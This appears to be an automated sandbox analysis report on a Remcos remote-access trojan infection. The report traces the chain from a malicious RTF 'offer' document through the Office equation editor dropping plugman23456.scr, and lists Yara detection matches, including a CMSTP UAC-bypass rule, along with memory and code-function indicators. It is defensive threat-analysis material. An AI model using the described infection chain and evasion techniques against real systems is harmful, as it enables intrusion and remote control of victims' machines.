                  Source: Yara matchFile source: 5.2.plugman23456.scr.34f9570.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.885917708.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.396020237.0000000000914000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.886068183.0000000000E9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.885963497.0000000000748000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: plugman23456.scr PID: 3396, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: plugman23456.scr PID: 3704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: znlzneAxBVd.exe PID: 3252, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: Offer ZI-0428.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: 25.2.znlzneAxBVd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 25.2.znlzneAxBVd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 25.2.znlzneAxBVd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 5.2.plugman23456.scr.34f9570.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 5.2.plugman23456.scr.34f9570.6.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 5.2.plugman23456.scr.34f9570.6.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 25.2.znlzneAxBVd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 25.2.znlzneAxBVd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 25.2.znlzneAxBVd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 5.2.plugman23456.scr.3572190.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 5.2.plugman23456.scr.3572190.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 5.2.plugman23456.scr.3572190.5.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 5.2.plugman23456.scr.3572190.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 5.2.plugman23456.scr.3572190.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 5.2.plugman23456.scr.34f9570.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 5.2.plugman23456.scr.34f9570.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: plugman23456.scr PID: 3396, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: znlzneAxBVd.exe PID: 3252, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Office equation editor drops PE file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\plug[1].scrJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\plugman23456.scrJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrProcess Stats: CPU usage > 49%
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,21_2_0040DD85
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_00401806 NtdllDefWindowProc_W,21_2_00401806
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_004018C0 NtdllDefWindowProc_W,21_2_004018C0
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_004016FD NtdllDefWindowProc_A,22_2_004016FD
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_004017B7 NtdllDefWindowProc_A,22_2_004017B7
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_00402CAC NtdllDefWindowProc_A,23_2_00402CAC
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_00402D66 NtdllDefWindowProc_A,23_2_00402D66
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,25_2_004167B4
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0030F9542_2_0030F954
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0031418D2_2_0031418D
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 5_2_001B04D45_2_001B04D4
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 5_2_001BE1205_2_001BE120
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 5_2_001B11695_2_001B1169
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 5_2_001BE5585_2_001BE558
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 5_2_001BD8935_2_001BD893
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 5_2_001BEAA05_2_001BEAA0
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 5_2_001BDCE85_2_001BDCE8
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 12_2_1001719412_2_10017194
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 12_2_1000B5C112_2_1000B5C1
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 15_2_001704D415_2_001704D4
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 15_2_0017E12015_2_0017E120
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 15_2_0017116915_2_00171169
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 15_2_0017E55815_2_0017E558
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 15_2_0017E54815_2_0017E548
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 15_2_0017D89215_2_0017D892
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 15_2_0017EAA015_2_0017EAA0
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 15_2_0017DCE815_2_0017DCE8
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0044B04021_2_0044B040
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0043610D21_2_0043610D
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0044731021_2_00447310
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0044A49021_2_0044A490
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0040755A21_2_0040755A
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0043C56021_2_0043C560
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0044B61021_2_0044B610
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0044D6C021_2_0044D6C0
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_004476F021_2_004476F0
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0044B87021_2_0044B870
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0044081D21_2_0044081D
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0041495721_2_00414957
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_004079EE21_2_004079EE
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_00407AEB21_2_00407AEB
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0044AA8021_2_0044AA80
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_00412AA921_2_00412AA9
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_00404B7421_2_00404B74
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_00404B0321_2_00404B03
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0044BBD821_2_0044BBD8
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_00404BE521_2_00404BE5
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_00404C7621_2_00404C76
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_00415CFE21_2_00415CFE
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_00416D7221_2_00416D72
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_00446D3021_2_00446D30
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_00446D8B21_2_00446D8B
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_00406E8F21_2_00406E8F
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_0040503822_2_00405038
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_0041208C22_2_0041208C
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_004050A922_2_004050A9
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_0040511A22_2_0040511A
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_0043C13A22_2_0043C13A
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_004051AB22_2_004051AB
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_0044930022_2_00449300
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_0040D32222_2_0040D322
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_0044A4F022_2_0044A4F0
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_0043A5AB22_2_0043A5AB
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_0041363122_2_00413631
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_0044669022_2_00446690
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_0044A73022_2_0044A730
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_004398D822_2_004398D8
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_004498E022_2_004498E0
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_0044A88622_2_0044A886
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_0043DA0922_2_0043DA09
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_00438D5E22_2_00438D5E
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_00449ED022_2_00449ED0
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_0041FE8322_2_0041FE83
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_00430F5422_2_00430F54
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_004050C223_2_004050C2
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_004014AB23_2_004014AB
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_0040513323_2_00405133
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_004051A423_2_004051A4
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_0040124623_2_00401246
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_0040CA4623_2_0040CA46
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_0040523523_2_00405235
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_004032C823_2_004032C8
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_0040168923_2_00401689
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_00402F6023_2_00402F60
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0043E0CC25_2_0043E0CC
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0041F0FA25_2_0041F0FA
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0045415925_2_00454159
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0043816825_2_00438168
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_004461F025_2_004461F0
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0043E2FB25_2_0043E2FB
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0045332B25_2_0045332B
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0042739D25_2_0042739D
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_004374E625_2_004374E6
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0043E55825_2_0043E558
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0043877025_2_00438770
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_004378FE25_2_004378FE
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0043394625_2_00433946
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0044D9C925_2_0044D9C9
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00427A4625_2_00427A46
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0041DB6225_2_0041DB62
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00427BAF25_2_00427BAF
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00437D3325_2_00437D33
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00435E5E25_2_00435E5E
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00426E0E25_2_00426E0E
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0043DE9D25_2_0043DE9D
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00413FCA25_2_00413FCA
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00436FEA25_2_00436FEA
                  Source: tmpF0B6.tmp.5.drOLE indicator, VBA macros: true
                  Source: tmpE15.tmp.15.drOLE indicator, VBA macros: true
                  Source: tmpF0B6.tmp.5.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: tmpE15.tmp.15.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: String function: 00434E10 appears 54 times
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: String function: 00402093 appears 50 times
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: String function: 00434770 appears 41 times
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: String function: 00401E65 appears 34 times
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: String function: 004169A7 appears 87 times
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: String function: 0044DB70 appears 41 times
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: String function: 004165FF appears 35 times
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: String function: 00422297 appears 42 times
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: String function: 00444B5A appears 37 times
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: String function: 00413025 appears 79 times
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: String function: 00416760 appears 69 times
                  Source: Offer ZI-0428.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: 25.2.znlzneAxBVd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 25.2.znlzneAxBVd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 25.2.znlzneAxBVd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 5.2.plugman23456.scr.34f9570.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 5.2.plugman23456.scr.34f9570.6.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 5.2.plugman23456.scr.34f9570.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 25.2.znlzneAxBVd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 25.2.znlzneAxBVd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 25.2.znlzneAxBVd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 5.2.plugman23456.scr.3572190.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 5.2.plugman23456.scr.3572190.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 5.2.plugman23456.scr.3572190.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 5.2.plugman23456.scr.3572190.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 5.2.plugman23456.scr.3572190.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 5.2.plugman23456.scr.34f9570.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 5.2.plugman23456.scr.34f9570.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: plugman23456.scr PID: 3396, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
